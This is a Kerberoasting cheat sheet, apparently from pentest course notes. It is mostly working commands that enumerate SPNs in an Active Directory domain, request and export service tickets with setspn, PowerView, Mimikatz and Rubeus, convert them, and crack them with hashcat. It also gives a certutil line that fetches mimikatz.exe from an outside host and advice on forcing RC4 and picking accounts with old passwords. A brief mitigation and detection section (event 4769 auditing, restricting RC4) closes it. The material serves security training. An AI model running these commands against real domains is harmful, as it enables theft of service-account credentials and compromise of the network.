kerberoasting-using-windows

Kerberos attack (Windows)

Manual method (semi-manual)

Enumerate SPNs (get user by SPN)

Look for user below CN

setspn.exe -Q */*

Get Kerberos TGS ticket (get a ticket with single user)

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Show all tickets

Now , after above commands all tickets are loaded in the memory

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extract TGS tickets from memory

.\mimikatz.exe "base64 /out:true" "kerberos::list /export" exit

Cracking kerberos TGS ticket

Preparing the base64 file (linux)

cat <base64_ticket> | tr -d \\n

Converting base64 ticket to .kirbi

cat <base64_ticket> | base64 -d > sqldev.kirbi

Extract kerberos ticket (kirbi2john)

Kirbi2john sqldev.kirbi > hash_file

Modify crack_file for hashcat

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Crack the hash

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Automation method:

Powerview - Tool

Extract TGS tickets

Import-Module .\powerview.ps1

Get-DomainUser * -spn | select samaccountname, serviceprincipalname

Extract TGS ticket (target a specific user, all user via SPN)

Get-DomainUser -Identity <user> | Get-DomainSPNTicket -OutputFormat Hashcat

OR

Get-DomainUser -SPN  | Get-DomainSPNTicket -OutputFormat Hashcat

Export all Tickets to CSV file

Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\kerberos_hashes.csv -NoTypeInformation

Mimikatz - tool

certutil.exe -urlcache -f http://10.10.16.31/mimikatz/x64/mimikatz.exe mimikatz.exe

.\mimikatz.exe "kerberos::list /export" exit

Rubeus - Tool

Enumerate password information

If you saw any SPN account with their password set 5 years ago are more promising targets as they have a weak password.

.\rubeus.exe kerberoast /stats

Request a kerberos TGS ticket

.\rubeus.exe kerberoast /ldapfilter:'<user_name>=1' /nowrap

.\rubeus.exe kerberoast /user:testspn /nowrap

Kerberoasting tool typically request RC4 encryption because RC4 is easier to crack than AES-128, AES-256.

User encryption type is specified or not (PowerView - tool)

0 means not specified

Get-DomainUser <username> -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

Crack hashes

AES256 - $18 hash -> -m 19700
RC4 - $23 -> -m 13100

We can use Rubeus with the /tgtdeleg flag to specify that we want only RC4 encryption when requesting a new service ticket.

Edit encryption type used by kerberos

Group policy management editor > Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options, then double-clicking on "Network security: Configure encryption types allowed for Kerberos" and edit encryption type.

Mitigation & detection

Enable kerberos authentication logs

Computer configuration > Policies > windows settings > security settings > advanced audit policy configuration > audit policies > account logon > "audit kerberos authentication service property"
10-20 kerberos TGS requests for a given account can be considered normal in a given environment but a large amount 4769 event IDs from one account within short period of time me indicate an attack.

Restricting the use of RC4 algorithm

PreviousKerberoasting attack (linux)NextKerberoasting

Last updated 1 day ago

hashtagKerberos attack (Windows)

hashtagAutomation method:

hashtagPowerview - Tool

hashtagMimikatz - tool

hashtagRubeus - Tool

hashtagMitigation & detection